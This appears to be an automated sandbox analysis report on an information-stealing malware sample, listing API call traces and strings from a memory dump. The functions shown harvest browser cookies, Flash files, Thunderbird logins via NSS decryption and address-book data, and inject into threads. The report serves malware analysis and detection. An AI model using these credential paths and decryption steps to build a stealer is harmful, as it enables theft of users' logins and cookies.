Opcode Fuzzy Hash: bf9af8248c8fda574d28e2be155fa00d992eb51c7ff9eb997397315e70ae1381
Instruction Fuzzy Hash: 4CE0173114020CB7EF106E14ED42FC93B59AF00794F40C024FE186D1A1EB72FA64DB90

Uniqueness

Uniqueness Score: -1.00%

Function 049FC1E3, Relevance: 1.3, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,04A13648,0000002C,049F7206,NTDLL.DLL,6547775A,00000000,04A0E4E3,?,00000318), ref: 049FC1FD

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: acac213a76d29ce22a9654bf758d19e162e9bf37fdc0e7c34b3aa61fdff053af
Instruction ID: 9087cf75967ed38a9be42a6f1d65c91e1e55fec84efe3c3b3efe6aaad51e7597
Opcode Fuzzy Hash: acac213a76d29ce22a9654bf758d19e162e9bf37fdc0e7c34b3aa61fdff053af
Instruction Fuzzy Hash: 51D0E231D01219DBDB219BA4D885A9EFB70BB08710B608224E9A0761A0C62069128B90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04A0CB16, Relevance: 63.2, APIs: 19, Strings: 17, Instructions: 238memorystringfileCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(%APPDATA%,04A11B9D,00000000,?,00000000), ref: 04A0CB2E

Part of subcall function 04A0AF0E: lstrlenW.KERNEL32(?,77E61120,?,?,00000250,?,00000000), ref: 04A0AF5A
Part of subcall function 04A0AF0E: lstrlenW.KERNEL32(?,?,00000000), ref: 04A0AF66
Part of subcall function 04A0AF0E: memset.NTDLL ref: 04A0AFAE
Part of subcall function 04A0AF0E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04A0AFC9
Part of subcall function 04A0AF0E: lstrlenW.KERNEL32(0000002C), ref: 04A0B001
Part of subcall function 04A0AF0E: lstrlenW.KERNEL32(?), ref: 04A0B009
Part of subcall function 04A0AF0E: memset.NTDLL ref: 04A0B02C
Part of subcall function 04A0AF0E: wcscpy.NTDLL ref: 04A0B03E

Part of subcall function 04A0AF0E: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 04A0B064
Part of subcall function 04A0AF0E: RtlEnterCriticalSection.NTDLL(?), ref: 04A0B09A
Part of subcall function 04A0AF0E: RtlLeaveCriticalSection.NTDLL(?), ref: 04A0B0B6
Part of subcall function 04A0AF0E: FindNextFileW.KERNEL32(?,00000000), ref: 04A0B0CF
Part of subcall function 04A0AF0E: WaitForSingleObject.KERNEL32(00000000), ref: 04A0B0E1
Part of subcall function 04A0AF0E: FindClose.KERNEL32(?), ref: 04A0B0F6
Part of subcall function 04A0AF0E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04A0B10A
Part of subcall function 04A0AF0E: lstrlenW.KERNEL32(0000002C), ref: 04A0B12C

RtlAllocateHeap.NTDLL(00000000,00000036,%APPDATA%\Mozilla\Firefox\Profiles), ref: 04A0CB75
memcpy.NTDLL(00000000,%APPDATA%,00000000,?,00000000), ref: 04A0CB8A
lstrcpyW.KERNEL32(00000000,\Macromedia\Flash Player\), ref: 04A0CB9A

Part of subcall function 04A0AF0E: FindNextFileW.KERNEL32(?,00000000), ref: 04A0B1A2
Part of subcall function 04A0AF0E: WaitForSingleObject.KERNEL32(00000000), ref: 04A0B1B4
Part of subcall function 04A0AF0E: FindClose.KERNEL32(?), ref: 04A0B1CF

HeapFree.KERNEL32(00000000,00000000,00000000,*.sol,?,00000000,00000000,00000010,?,?,00000000), ref: 04A0CBBE
RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 04A0CBD6
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 04A0CC22
lstrlenW.KERNEL32(00000000,%userprofile%\AppData\Local\,?,00000000), ref: 04A0CC41
RtlAllocateHeap.NTDLL(00000000,?), ref: 04A0CC53
HeapFree.KERNEL32(00000000,00000000,00000000,cookies,?,00000000,00000000,00000014,?,00000000), ref: 04A0CCAA
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 04A0CCBC
CreateDirectoryW.KERNEL32(00000000,00000000,%userprofile%\AppData\Local\,?,00000000), ref: 04A0CCE3
lstrlenW.KERNEL32(\cookie.ed,%userprofile%\AppData\Local\,?,00000000), ref: 04A0CD16
lstrlenW.KERNEL32(\cookie.cr,%userprofile%\AppData\Local\,?,00000000), ref: 04A0CD2B
lstrlenW.KERNEL32(\cookie.ff,%userprofile%\AppData\Local\,?,00000000), ref: 04A0CD40
lstrlenW.KERNEL32(\cookie.ie,%userprofile%\AppData\Local\,?,00000000), ref: 04A0CD55
DeleteFileW.KERNEL32(?,%userprofile%\AppData\Local\,?,00000000), ref: 04A0CD85
HeapFree.KERNEL32(00000000,?,?,00000000), ref: 04A0CD93
HeapFree.KERNEL32(00000000,?,?,00000000), ref: 04A0CDB6

Strings

*.txt, xrefs: 04A0CBF7
Microsoft\Edge\User Data\Default, xrefs: 04A0CC7E
%APPDATA%, xrefs: 04A0CB21, 04A0CB84
\cookie.cr, xrefs: 04A0CD25, 04A0CD2A
cookies.sqlite-journal, xrefs: 04A0CB5C
\cookie.ff, xrefs: 04A0CD3A, 04A0CD3F
\sols, xrefs: 04A0CD64
cookies.sqlite, xrefs: 04A0CB41
\cookie.ie, xrefs: 04A0CD4F, 04A0CD54, 04A0CD70
\Macromedia\Flash Player\, xrefs: 04A0CB92
%userprofile%\AppData\Local\, xrefs: 04A0CC28
\cookie.ed, xrefs: 04A0CD10, 04A0CD15
Google\Chrome\User Data\Default, xrefs: 04A0CC5B
%APPDATA%\Mozilla\Firefox\Profiles, xrefs: 04A0CB46, 04A0CB4B, 04A0CB61
*.cookie, xrefs: 04A0CC0D
cookies, xrefs: 04A0CC73, 04A0CC95
*.sol, xrefs: 04A0CBA9

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Heap$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymemcpywcscpy
String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$%userprofile%\AppData\Local\$*.cookie$*.sol$*.txt$Google\Chrome\User Data\Default$Microsoft\Edge\User Data\Default$\Macromedia\Flash Player\$\cookie.cr$\cookie.ed$\cookie.ff$\cookie.ie$\sols$cookies$cookies.sqlite$cookies.sqlite-journal
API String ID: 1436586947-1887243743
Opcode ID: 31e396da1262edc5187557407a06d684221bf228f637884adc4f95cddb94d3c1
Instruction ID: 4e8855e8cb518365ac384652a4c6e1147e6869ff96ddcc7ef864eb2be9b8fa5b
Opcode Fuzzy Hash: 31e396da1262edc5187557407a06d684221bf228f637884adc4f95cddb94d3c1
Instruction Fuzzy Hash: 5971B371244314BFEB20AF65ED88C5B7FFCEB99B04F004519F905A21A1E679BE05CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04A1056C, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 224memoryfiletimeCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,63699BC3,.dll), ref: 04A1059A
RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 04A105BD
memset.NTDLL ref: 04A105D8

Part of subcall function 04A013D7: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,63699BCE,04A105F1,73797325), ref: 04A013E8
Part of subcall function 04A013D7: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04A01402

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 04A10619
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04A1062F
CloseHandle.KERNEL32(?), ref: 04A10649
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04A10656
lstrcat.KERNEL32(?,642E2A5C), ref: 04A1069B
FindFirstFileA.KERNEL32(?,?), ref: 04A106B0
CompareFileTime.KERNEL32(?,?), ref: 04A106CE
FindNextFileA.KERNEL32(?,?), ref: 04A106E1
FindClose.KERNEL32(?), ref: 04A106EF
FindFirstFileA.KERNEL32(?,?), ref: 04A106FA
CompareFileTime.KERNEL32(?,?), ref: 04A1071A
StrChrA.SHLWAPI(?,0000002E), ref: 04A10752
memcpy.NTDLL(?,?,00000000), ref: 04A10788
FindNextFileA.KERNEL32(?,?), ref: 04A1079D
FindClose.KERNEL32(?), ref: 04A107AB
FindFirstFileA.KERNEL32(?,?), ref: 04A107B6
CompareFileTime.KERNEL32(?,?), ref: 04A107C6
FindClose.KERNEL32(?), ref: 04A107FF
HeapFree.KERNEL32(00000000,?,73797325), ref: 04A10812
HeapFree.KERNEL32(00000000,?), ref: 04A10823

Strings

.dll, xrefs: 04A10585

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$CreateHandlelstrcatmemcpymemset
String ID: .dll
API String ID: 455834338-2738580789
Opcode ID: 53f09795d0b95012662ec75a027aac57508eda27b50d1a1cc3ac22dea8fcb9a1
Instruction ID: 8cb15b844a93940f0e2e40e2dcac0cc3d3cb061ef195af936b2204586f5999c0
Opcode Fuzzy Hash: 53f09795d0b95012662ec75a027aac57508eda27b50d1a1cc3ac22dea8fcb9a1
Instruction Fuzzy Hash: 748146B2508301AFEB10DF25DC84E6BBBE9FB98754F00092EF985D2160E774E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 04A0AF0E, Relevance: 28.7, APIs: 19, Instructions: 234stringfilesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 049F253A: RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

Part of subcall function 04A0086D: ExpandEnvironmentStringsW.KERNEL32(04A0BA72,00000000,00000000,00000001,00000000,00000000,?,04A0BA72,00000000), ref: 04A00884
Part of subcall function 04A0086D: ExpandEnvironmentStringsW.KERNEL32(04A0BA72,00000000,00000000,00000000), ref: 04A0089E

lstrlenW.KERNEL32(?,77E61120,?,?,00000250,?,00000000), ref: 04A0AF5A
lstrlenW.KERNEL32(?,?,00000000), ref: 04A0AF66
memset.NTDLL ref: 04A0AFAE
FindFirstFileW.KERNEL32(00000000,00000000), ref: 04A0AFC9
lstrlenW.KERNEL32(0000002C), ref: 04A0B001
lstrlenW.KERNEL32(?), ref: 04A0B009
memset.NTDLL ref: 04A0B02C
wcscpy.NTDLL ref: 04A0B03E
PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 04A0B064
RtlEnterCriticalSection.NTDLL(?), ref: 04A0B09A

Part of subcall function 04A02A35: RtlFreeHeap.NTDLL(00000000,?,049F10F7,?,?,0000002C,?), ref: 04A02A41

RtlLeaveCriticalSection.NTDLL(?), ref: 04A0B0B6
FindNextFileW.KERNEL32(?,00000000), ref: 04A0B0CF
WaitForSingleObject.KERNEL32(00000000), ref: 04A0B0E1
FindClose.KERNEL32(?), ref: 04A0B0F6
FindFirstFileW.KERNEL32(00000000,00000000), ref: 04A0B10A
lstrlenW.KERNEL32(0000002C), ref: 04A0B12C
FindNextFileW.KERNEL32(?,00000000), ref: 04A0B1A2
WaitForSingleObject.KERNEL32(00000000), ref: 04A0B1B4
FindClose.KERNEL32(?), ref: 04A0B1CF

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
String ID:
API String ID: 2962561936-0
Opcode ID: f744466bfbc336cf4d747b5df92838f9ae597b6d1af29e4de9b56c8fc68ccd20
Instruction ID: 73d4a6d56afea81e533bc39ee870991bdd5f0967b8ee1ee65807dfedda9e9910
Opcode Fuzzy Hash: f744466bfbc336cf4d747b5df92838f9ae597b6d1af29e4de9b56c8fc68ccd20
Instruction Fuzzy Hash: 8A818C71504345AFEB21EF64ED84B1BBBE8EF98304F008829F995961A1DB74F8468B61

Uniqueness

Uniqueness Score: -1.00%

Function 049FFCF3, Relevance: 25.0, APIs: 12, Strings: 2, Instructions: 508memoryCOMMON

Download Yara Rule

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,74B5F710,00000000,00000000), ref: 049FFD2B
StrToIntExA.SHLWAPI(00000000,00000000,?,74B5F710,00000000,00000000), ref: 049FFD5D
StrToIntExA.SHLWAPI(00000000,00000000,?,74B5F710,00000000,00000000), ref: 049FFD8F
StrToIntExA.SHLWAPI(00000000,00000000,?,74B5F710,00000000,00000000), ref: 049FFDC1
StrToIntExA.SHLWAPI(00000000,00000000,?,74B5F710,00000000,00000000), ref: 049FFDF3
StrToIntExA.SHLWAPI(00000000,00000000,?,74B5F710,00000000,00000000), ref: 049FFE25
StrToIntExA.SHLWAPI(00000000,00000000,?,74B5F710,00000000,00000000), ref: 049FFE57
StrToIntExA.SHLWAPI(00000000,00000000,?,74B5F710,00000000,00000000), ref: 049FFE89
StrToIntExA.SHLWAPI(00000000,00000000,?,74B5F710,00000000,00000000), ref: 049FFEBB
HeapFree.KERNEL32(00000000,?,Scr,?,?,74B5F710,00000000,00000000), ref: 04A00046

Part of subcall function 049F7D83: RtlEnterCriticalSection.NTDLL(05A98D20), ref: 049F7D8C
Part of subcall function 049F7D83: HeapFree.KERNEL32(00000000,?), ref: 049F7DBE
Part of subcall function 049F7D83: RtlLeaveCriticalSection.NTDLL(05A98D20), ref: 049F7DDC

HeapFree.KERNEL32(00000000,?,Keys,?,?,74B5F710,00000000,00000000), ref: 04A00085
StrToIntExA.SHLWAPI(00000000,00000000,?,Keys,?,?,74B5F710,00000000,00000000), ref: 04A000DF

Part of subcall function 049F5772: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,049F2C4F,?,00000000,?,00000000,?,00000000,00000000,00000000), ref: 049F577B
Part of subcall function 049F5772: memcpy.NTDLL(00000000,?,00000000,00000001), ref: 049F579E
Part of subcall function 049F5772: memset.NTDLL ref: 049F57AD

Strings

Scr, xrefs: 04A00025
Keys, xrefs: 04A00050

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap$CriticalSection$EnterLeavelstrlenmemcpymemset
String ID: Keys$Scr
API String ID: 2064646876-3950322802
Opcode ID: 969f17443584fad305297d314e8aae8a52c02c6fd322f488e90e9b17dd512c41
Instruction ID: 88459d090cedcbd5d32e1179162d7b9ce5ab10bbf7dfba27b80853b9c2fb989b
Opcode Fuzzy Hash: 969f17443584fad305297d314e8aae8a52c02c6fd322f488e90e9b17dd512c41
Instruction Fuzzy Hash: 70F1C274715211AFE760EFB4BD84E6F32FD9B187047648836AA05E71A8EB74FD028760

Uniqueness

Uniqueness Score: -1.00%

Function 04A05ECD, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 91memorystringsynchronizationCOMMON

Download Yara Rule

APIs

wcscpy.NTDLL ref: 04A05EFA
GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 04A05F06
RtlAllocateHeap.NTDLL(00000000,?), ref: 04A05F17
memset.NTDLL ref: 04A05F34
GetLogicalDriveStringsW.KERNEL32(?,?), ref: 04A05F42
WaitForSingleObject.KERNEL32(00000000), ref: 04A05F50
GetDriveTypeW.KERNEL32(?), ref: 04A05F5E
lstrlenW.KERNEL32(?), ref: 04A05F6A
wcscpy.NTDLL ref: 04A05F7D
lstrlenW.KERNEL32(?), ref: 04A05F97
HeapFree.KERNEL32(00000000,?), ref: 04A05FB0

Strings

\\?\, xrefs: 04A05EEF

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
String ID: \\?\
API String ID: 3888849384-4282027825
Opcode ID: 7ff265719d088fe24debe2f2b8da24c4fcd2c8ffccd657eedd1aa43ef4c17988
Instruction ID: c4d4a17228b5d6787509f26639e6b34bb6209cdd56cb19e7a053663dbc546dc4
Opcode Fuzzy Hash: 7ff265719d088fe24debe2f2b8da24c4fcd2c8ffccd657eedd1aa43ef4c17988
Instruction Fuzzy Hash: D8311E72D00118BFEF019FA4EC85CAEBBBDEB14358B118466F901E21A0D739AE559F60

Uniqueness

Uniqueness Score: -1.00%

Function 049FA4FF, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 65threadprocesslibraryCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 049FA525
CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 049FA531
GetModuleHandleA.KERNEL32(KERNEL32.DLL,ExitProcess), ref: 049FA548
GetProcAddress.KERNEL32(00000000), ref: 049FA54F
Thread32First.KERNEL32(?,0000001C), ref: 049FA55F
OpenThread.KERNEL32(001F03FF,00000000,?), ref: 049FA57A
QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 049FA58B
CloseHandle.KERNEL32(00000000), ref: 049FA592
Thread32Next.KERNEL32(?,0000001C), ref: 049FA59B
CloseHandle.KERNEL32(?), ref: 049FA5A7

Strings

KERNEL32.DLL, xrefs: 049FA543
ExitProcess, xrefs: 049FA53E

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
String ID: ExitProcess$KERNEL32.DLL
API String ID: 2341152533-108369947
Opcode ID: d683b03332014e321e81f35bef19712617cc862d2b692005be6669cee8295d68
Instruction ID: 49d84b44f429ef801ff1a980be64674083393f09e4c29f04eba8ccf9bcd0faea
Opcode Fuzzy Hash: d683b03332014e321e81f35bef19712617cc862d2b692005be6669cee8295d68
Instruction Fuzzy Hash: 37116072900218FFEF11AFA0DD84DAE7BBDEB48354F004035FA05A6160D734AE46DB60

Uniqueness

Uniqueness Score: -1.00%

Function 049FBF1E, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 04A041A5: ExpandEnvironmentStringsW.KERNEL32(75D706E0,00000000,00000000,75D706E0,?,80000001,04A0F531,00750025,80000001,?), ref: 04A041B6
Part of subcall function 04A041A5: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000000,?,80000001,04A0F531,00750025,80000001,?), ref: 04A041D3

FreeLibrary.KERNEL32(?), ref: 049FC046

Part of subcall function 04A00AE7: lstrlenW.KERNEL32(?,00000000,?,?,?,049FBF8B,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 04A00AF4
Part of subcall function 04A00AE7: GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,049FBF8B,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 04A00B1D
Part of subcall function 04A00AE7: lstrcpyW.KERNEL32(-0000FFFE,?), ref: 04A00B3D
Part of subcall function 04A00AE7: lstrcpyW.KERNEL32(-00000002,nss3.dll), ref: 04A00B51
Part of subcall function 04A00AE7: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,049FBF8B,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 04A00B5D
Part of subcall function 04A00AE7: LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,049FBF8B,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 04A00B60
Part of subcall function 04A00AE7: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,049FBF8B,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 04A00B6C
Part of subcall function 04A00AE7: GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 04A00B7E
Part of subcall function 04A00AE7: GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 04A00B8D
Part of subcall function 04A00AE7: GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 04A00B9C
Part of subcall function 04A00AE7: GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 04A00BAB
Part of subcall function 04A00AE7: GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 04A00BBA
Part of subcall function 04A00AE7: GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 04A00BC9

FindFirstFileW.KERNEL32(?,?,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 049FBF9C
lstrlenW.KERNEL32(?), ref: 049FBFB8
lstrlenW.KERNEL32(?), ref: 049FBFD0

Part of subcall function 049F253A: RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

lstrcpyW.KERNEL32(00000000,?), ref: 049FBFE9
lstrcpyW.KERNEL32(00000002), ref: 049FBFFE

Part of subcall function 049F9796: lstrlenW.KERNEL32(?), ref: 049F97A6
Part of subcall function 049F9796: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001), ref: 049F97C8
Part of subcall function 049F9796: lstrcpyW.KERNEL32(00000000,?), ref: 049F97F4
Part of subcall function 049F9796: lstrcatW.KERNEL32(00000000,\logins.json), ref: 049F9800

FindNextFileW.KERNEL32(?,00000010), ref: 049FC026
FindClose.KERNEL32(00000002), ref: 049FC034

Strings

%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default, xrefs: 049FBF60
%PROGRAMFILES%\Mozilla Thunderbird, xrefs: 049FBF3C

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: AddressProc$lstrcpy$lstrlen$CurrentDirectoryFind$EnvironmentExpandFileLibraryStrings$AllocateByteCharCloseFirstFreeHeapLoadMultiNextWidelstrcat
String ID: %PROGRAMFILES%\Mozilla Thunderbird$%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default
API String ID: 1209511739-2644807129
Opcode ID: cccabb6b139e928c926514d69293e10412bda6feebc12e55afae96fe2afe3dd0
Instruction ID: 6674cb153ee23b9a52cb4017067fc368e023588af384d68104894f3839bb49fd
Opcode Fuzzy Hash: cccabb6b139e928c926514d69293e10412bda6feebc12e55afae96fe2afe3dd0
Instruction Fuzzy Hash: 85318571508355AFDB21EF20DC04A1FBBE9FF88B54F04492DF980A2150DB34E906CB92

Uniqueness

Uniqueness Score: -1.00%

Function 04A0F7FD, Relevance: 16.6, APIs: 11, Instructions: 130libraryloadernativeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,63699BC3,00000000,?,?,04A01CC6,?,00000000,?), ref: 04A0F830
GetLastError.KERNEL32(?,?,04A01CC6,?,00000000,?), ref: 04A0F83E
NtSetInformationProcess.NTDLL ref: 04A0F898
GetProcAddress.KERNEL32(456C7452,00000000), ref: 04A0F8D7
GetProcAddress.KERNEL32(61657243), ref: 04A0F8F8
TerminateThread.KERNEL32(?,00000000,?,00000004,00000000), ref: 04A0F94F
CloseHandle.KERNEL32(?), ref: 04A0F965
CloseHandle.KERNEL32(?), ref: 04A0F98B

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
String ID:
API String ID: 3529370251-0
Opcode ID: ac6db3a960d3bc0115e78327845dcd163ae42af1bd669f95d67fd1376f404f61
Instruction ID: 4ed3e19a55ad06e42a4489ed72828a26c3e50f63ba3cb75aaa0301ce44b3f71a
Opcode Fuzzy Hash: ac6db3a960d3bc0115e78327845dcd163ae42af1bd669f95d67fd1376f404f61
Instruction Fuzzy Hash: A541A671608305EFEB21DF24EC44A5BBBF4FB98748F00492DF995A21A0D3B4E949CB52

Uniqueness

Uniqueness Score: -1.00%

Function 04A08436, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91memoryCOMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 04A08460
RtlAllocateHeap.NTDLL(00000000,?), ref: 04A08473
GetUserNameW.ADVAPI32(00000000,?), ref: 04A08485
HeapFree.KERNEL32(00000000,04A1606E,?,?,04A0FA05,?,04A1606E,?,?,?), ref: 04A084A4
GetComputerNameW.KERNEL32(00000000,?), ref: 04A084B2
RtlAllocateHeap.NTDLL(00000000,?), ref: 04A084C9
GetComputerNameW.KERNEL32(00000000,?), ref: 04A084DA
HeapFree.KERNEL32(00000000,00000000,?,?,04A0FA05,?,04A1606E,?,?,?), ref: 04A084FB

Strings

Client, xrefs: 04A08447

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID: Client
API String ID: 3239747167-3236430179
Opcode ID: 70dbc76d53b8184d06fe743e4507b106e2535e0a9ce008007948dd8bf9aff546
Instruction ID: e9d27336923a4a3eee748fd2a0f8902b918ffda2732aadfd07714f9cd1d891a3
Opcode Fuzzy Hash: 70dbc76d53b8184d06fe743e4507b106e2535e0a9ce008007948dd8bf9aff546
Instruction Fuzzy Hash: 7D31EDB2900209FFEB00EFA4DD8586EBBF9FB54314B158469E905D3250D739EE42DB50

Uniqueness

Uniqueness Score: -1.00%

Function 04A010B4, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 85registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 04A010CF
RegCloseKey.ADVAPI32(?), ref: 04A01180

Part of subcall function 049F253A: RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

LoadLibraryA.KERNEL32(00000000), ref: 04A0111D
GetProcAddress.KERNEL32(00000000,WABOpen), ref: 04A0112F
GetLastError.KERNEL32 ref: 04A0114E
FreeLibrary.KERNEL32(00000000), ref: 04A01160
GetLastError.KERNEL32 ref: 04A01168

Strings

Software\Microsoft\WAB\DLLPath, xrefs: 04A010C0
WABOpen, xrefs: 04A01129

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
String ID: Software\Microsoft\WAB\DLLPath$WABOpen
API String ID: 1628847533-1249168598
Opcode ID: 649a735f8efa75974e5c42c3ef8972a56833c13e6d53df89f196abec660df5ae
Instruction ID: bf163704a2d2637a2c7369a09251c12bfabfb932ea93aa8356009a5acfd7a021
Opcode Fuzzy Hash: 649a735f8efa75974e5c42c3ef8972a56833c13e6d53df89f196abec660df5ae
Instruction Fuzzy Hash: 8221CB31901214FFDF225FA4EC88DDEBFBCEB58750B148159F901A3151E6366D41DB50

Uniqueness

Uniqueness Score: -1.00%

Function 04A09363, Relevance: 10.6, APIs: 7, Instructions: 109filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,00000000,04A02A55), ref: 04A0937B

Part of subcall function 049F253A: RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

FindFirstFileW.KERNEL32(00000000,00000000,?,00000250,00000000,0000000A,00000208), ref: 04A093E4
lstrlenW.KERNEL32(0000002C,?,00000250,00000000,0000000A,00000208), ref: 04A0940C
RemoveDirectoryW.KERNEL32(?,?,00000250,00000000,0000000A,00000208), ref: 04A0945E
DeleteFileW.KERNEL32(?,?,00000250,00000000,0000000A,00000208), ref: 04A09469
FindNextFileW.KERNEL32(00000208,00000000,?,00000250,00000000,0000000A,00000208), ref: 04A0947C

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
String ID:
API String ID: 499515686-0
Opcode ID: 03660c03043607fe9afe47de0bfaa30fbf2c92ffe588fe527d89a016cf86fd74
Instruction ID: 3117c6987299d2d3e3543d16bcc4fd56310425b9d00d16a4d3c8e2c3823b5d21
Opcode Fuzzy Hash: 03660c03043607fe9afe47de0bfaa30fbf2c92ffe588fe527d89a016cf86fd74
Instruction Fuzzy Hash: CB4141B1900209EFEF11AFA4EC44AEE7BBDEF44314F50C0A5E801A61A1DB76EE45DB50

Uniqueness

Uniqueness Score: -1.00%

Function 04A0FC10, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108stringnativeCOMMON

Download Yara Rule

APIs

NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 04A0FC5F
lstrlenW.KERNEL32(?), ref: 04A0FC6D
NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 04A0FC98
lstrcpyW.KERNEL32(00000006,00000000), ref: 04A0FCC6

Strings

DelegateExecute, xrefs: 04A0FC37
SOFTWARE\Classes\Chrome, xrefs: 04A0FCDE

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Query$lstrcpylstrlen
